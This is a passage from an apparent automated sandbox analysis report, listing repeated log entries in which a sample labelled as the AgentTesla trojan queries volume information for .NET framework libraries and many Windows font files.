                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
